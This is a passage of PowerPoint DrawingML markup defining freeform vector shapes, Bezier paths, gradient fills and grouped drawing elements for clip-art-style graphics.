                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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00"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="000000">
                          <a:gamma/>
                          <a:tint val="72549"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="000000"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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5" name="Freeform 826">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887869CE-BE1B-42FD-A401-51A294CB2B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252" y="1304"/>
                    <a:ext cx="109" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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6" name="Oval 827">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC291268-B5CB-44B8-A895-0B98C3801F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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2239" y="1204"/>
                    <a:ext cx="145" cy="145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930" name="Group 828">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944714EA-79D7-4772-9F6D-DEEFC0D485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2651125" y="2854325"/>
                <a:ext cx="481013" cy="388938"/>
                <a:chOff x="2154" y="1819"/>
                <a:chExt cx="217" cy="176"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1931" name="Group 829">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7C29009-E571-401E-B538-D9F3B0AECB2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154" y="1862"/>
                  <a:ext cx="217" cy="133"/>
                  <a:chOff x="1977" y="2705"/>
                  <a:chExt cx="897" cy="548"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1947" name="Freeform 830">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E66654B1-A6E0-4A51-9BA4-48CAA01147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977" y="2787"/>
                    <a:ext cx="45" cy="321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3 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 12"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 12 w 12"/>
                      <a:gd name="T7" fmla="*/ 3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3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8" name="Freeform 831">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404CA38A-D427-49AC-B93D-AF4E44CA14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022" y="2787"/>
                    <a:ext cx="46" cy="321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3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3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9" name="Freeform 832">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC604A2A-23B9-4A35-A906-3CBEFAC658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574" y="2932"/>
                    <a:ext cx="45" cy="321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3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0" name="Freeform 833">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103E7A82-3ED4-4CBC-B8CD-2DDB80FB44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529" y="2932"/>
                    <a:ext cx="45" cy="321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3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1" name="Freeform 834">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E65D0A59-040D-4BA3-A7E4-64CE46F703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829" y="2866"/>
                    <a:ext cx="45" cy="321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4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2" name="Freeform 835">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF16802-BD81-4158-A9ED-DC7EBC52AA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780" y="2866"/>
                    <a:ext cx="49" cy="321"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13 w 13"/>
                      <a:gd name="T1" fmla="*/ 87 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 13"/>
                      <a:gd name="T3" fmla="*/ 84 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 13"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 13 w 13"/>
                      <a:gd name="T7" fmla="*/ 4 h 87"/>
                      <a:gd name="T8" fmla="*/ 13 w 13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87">
                        <a:moveTo>
                          <a:pt x="13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3" y="4"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13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3" name="Freeform 836">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BE5C37-9749-45B1-846D-733D822FFA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277" y="2705"/>
                    <a:ext cx="45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3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4" name="Freeform 837">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BCA938-7B0F-4A22-96F9-3F58820C0F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277" y="2717"/>
                    <a:ext cx="45" cy="322"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12"/>
                      <a:gd name="T1" fmla="*/ 87 h 87"/>
                      <a:gd name="T2" fmla="*/ 12 w 12"/>
                      <a:gd name="T3" fmla="*/ 84 h 87"/>
                      <a:gd name="T4" fmla="*/ 12 w 12"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 0 w 12"/>
                      <a:gd name="T7" fmla="*/ 4 h 87"/>
                      <a:gd name="T8" fmla="*/ 0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5" name="Freeform 838">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E043A70-29E1-4E82-B699-05AF4119B5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235" y="2717"/>
                    <a:ext cx="42" cy="322"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12 w 12"/>
                      <a:gd name="T1" fmla="*/ 87 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 12"/>
                      <a:gd name="T3" fmla="*/ 84 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 12"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 12 w 12"/>
                      <a:gd name="T7" fmla="*/ 4 h 87"/>
                      <a:gd name="T8" fmla="*/ 12 w 12"/>
                      <a:gd name="T9" fmla="*/ 87 h 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4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6" name="Freeform 839">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E517BB09-5856-403F-B820-321D1D5F86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977" y="2787"/>
                    <a:ext cx="597" cy="206"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 161 w 161"/>
                      <a:gd name="T1" fmla="*/ 43 h 56"/>
                      <a:gd name="T2" fmla="*/ 161 w 161"/>
                      <a:gd name="T3" fmla="*/ 56 h 56"/>
                      <a:gd name="T4" fmla="*/ 0 w 161"/>
                      <a:gd name="T5" fmla="*/ 12 h 56"/>
                      <a:gd name="T6" fmla="*/ 0 w 161"/>
                      <a:gd name="T7" fmla="*/ 0 h 56"/>
                      <a:gd name="T8" fmla="*/ 161 w 161"/>
                      <a:gd name="T9" fmla="*/ 43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1" h="56">
                        <a:moveTo>
                          <a:pt x="161" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="56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61" y="43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7" name="Freeform 840">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA153DA-C15B-47D4-8925-E6DF04B572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574" y="2866"/>
                    <a:ext cx="300" cy="127"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 81 w 81"/>
                      <a:gd name="T1" fmla="*/ 0 h 35"/>
                      <a:gd name="T2" fmla="*/ 81 w 81"/>
                      <a:gd name="T3" fmla="*/ 13 h 35"/>
                      <a:gd name="T4" fmla="*/ 0 w 81"/>
                      <a:gd name="T5" fmla="*/ 35 h 35"/>
                      <a:gd name="T6" fmla="*/ 0 w 81"/>
                      <a:gd name="T7" fmla="*/ 22 h 35"/>
                      <a:gd name="T8" fmla="*/ 81 w 8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1" h="35">
                        <a:moveTo>
                          <a:pt x="81" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="81" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0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8" name="Freeform 841">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D10BA3-9EFB-42B2-AE25-72EF8DC76B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977" y="2705"/>
                    <a:ext cx="897" cy="240"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 242 w 242"/>
                      <a:gd name="T1" fmla="*/ 43 h 65"/>
                      <a:gd name="T2" fmla="*/ 161 w 242"/>
                      <a:gd name="T3" fmla="*/ 22 h 65"/>
                      <a:gd name="T4" fmla="*/ 161 w 242"/>
                      <a:gd name="T5" fmla="*/ 22 h 65"/>
                      <a:gd name="T6" fmla="*/ 81 w 242"/>
                      <a:gd name="T7" fmla="*/ 0 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 242"/>
                      <a:gd name="T9" fmla="*/ 22 h 65"/>
                      <a:gd name="T10" fmla="*/ 81 w 242"/>
                      <a:gd name="T11" fmla="*/ 44 h 65"/>
                      <a:gd name="T12" fmla="*/ 81 w 242"/>
                      <a:gd name="T13" fmla="*/ 44 h 65"/>
                      <a:gd name="T14" fmla="*/ 161 w 242"/>
                      <a:gd name="T15" fmla="*/ 65 h 65"/>
                      <a:gd name="T16" fmla="*/ 242 w 242"/>
                      <a:gd name="T17" fmla="*/ 43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42" h="65">
                        <a:moveTo>
                          <a:pt x="242" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="65"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="242" y="43"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E4700"/>
                  </a:solidFill>
                  <a:ln w="6350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32" name="Group 842">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAA951B8-4D8A-4CE1-AD79-A1807240194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216" y="1833"/>
                  <a:ext cx="90" cy="70"/>
                  <a:chOff x="2155" y="1811"/>
                  <a:chExt cx="675" cy="523"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1939" name="Freeform 843">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97ACFA9-E9B5-407B-B674-00B58DDEC9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490" y="1818"/>
                    <a:ext cx="314" cy="433"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4460"/>
                      <a:gd name="T1" fmla="*/ 0 h 6160"/>
                      <a:gd name="T2" fmla="*/ 0 w 4460"/>
                      <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                      <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                      <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                      <a:gd name="T8" fmla="*/ 0 w 4460"/>
                      <a:gd name="T9" fmla="*/ 0 h 61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460" h="6160">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="6160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="118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969696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0" name="Freeform 844">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97BD6290-4A1A-421A-9711-D1C698C701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513" y="1850"/>
                    <a:ext cx="268" cy="332"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 3803"/>
                      <a:gd name="T1" fmla="*/ 0 h 4725"/>
                      <a:gd name="T2" fmla="*/ 0 w 3803"/>
                      <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                      <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                      <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                      <a:gd name="T8" fmla="*/ 0 w 3803"/>
                      <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3711"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="4725"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="101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1" name="Freeform 845">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C49AA0B-6388-4A6A-815E-3B259F6542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490" y="1811"/>
                    <a:ext cx="340" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                      <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                      <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                      <a:gd name="T4" fmla="*/ 0 w 4831"/>
                      <a:gd name="T5" fmla="*/ 100 h 1288"/>
                      <a:gd name="T6" fmla="*/ 368 w 4831"/>
                      <a:gd name="T7" fmla="*/ 0 h 1288"/>
                      <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                        <a:moveTo>
                          <a:pt x="4831" y="1189"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4460" y="1288"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="368" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4831" y="1189"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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2" name="Freeform 846">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B2C6F1-8735-4824-9B83-9088EAE231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155" y="2127"/>
                    <a:ext cx="675" cy="181"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 9603"/>
                      <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T3" fmla="*/ 0 h 2577"/>
                      <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                      <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                      <a:gd name="T8" fmla="*/ 0 w 9603"/>
                      <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                        <a:moveTo>
                          <a:pt x="0" y="1287"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9603" y="1287"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="2577"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1287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969696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3" name="Freeform 847">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343173A3-BF9C-4976-BA77-B2A44A895D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493" y="2218"/>
                    <a:ext cx="337" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4801"/>
                      <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4801"/>
                      <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T5" fmla="*/ 369 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T7" fmla="*/ 0 h 1656"/>
                      <a:gd name="T8" fmla="*/ 0 w 4801"/>
                      <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                        <a:moveTo>
                          <a:pt x="0" y="1290"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1656"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290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C0C0C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4" name="Freeform 848">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54363603-755A-48C9-A482-ABC01B6503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155" y="2218"/>
                    <a:ext cx="338" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4802"/>
                      <a:gd name="T3" fmla="*/ 369 h 1656"/>
                      <a:gd name="T4" fmla="*/ 0 w 4802"/>
                      <a:gd name="T5" fmla="*/ 0 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                        <a:moveTo>
                          <a:pt x="4802" y="1656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1656"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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5" name="Freeform 849">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B41DDB5-33C6-4830-8DED-AAFD120CB5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251" y="2157"/>
                    <a:ext cx="457" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 6492"/>
                      <a:gd name="T1" fmla="*/ 654 h 1743"/>
                      <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                      <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                      <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                      <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                      <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                      <a:gd name="T7" fmla="*/ 0 h 1743"/>
                      <a:gd name="T8" fmla="*/ 0 w 6492"/>
                      <a:gd name="T9" fmla="*/ 654 h 17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492" h="1743">
                        <a:moveTo>
                          <a:pt x="0" y="654"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4061" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6492" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2431" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="654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C0C0C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6" name="Freeform 850">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015B46EB-DD31-49F9-8EA5-EFE4737786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804" y="1894"/>
                    <a:ext cx="26" cy="357"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 371"/>
                      <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                      <a:gd name="T2" fmla="*/ 371 w 371"/>
                      <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                      <a:gd name="T4" fmla="*/ 371 w 371"/>
                      <a:gd name="T5" fmla="*/ 0 h 5071"/>
                      <a:gd name="T6" fmla="*/ 0 w 371"/>
                      <a:gd name="T7" fmla="*/ 99 h 5071"/>
                      <a:gd name="T8" fmla="*/ 0 w 371"/>
                      <a:gd name="T9" fmla="*/ 5071 h 50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71" h="5071">
                        <a:moveTo>
                          <a:pt x="0" y="5071"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="371" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99"/>
                        </a:lnTo>
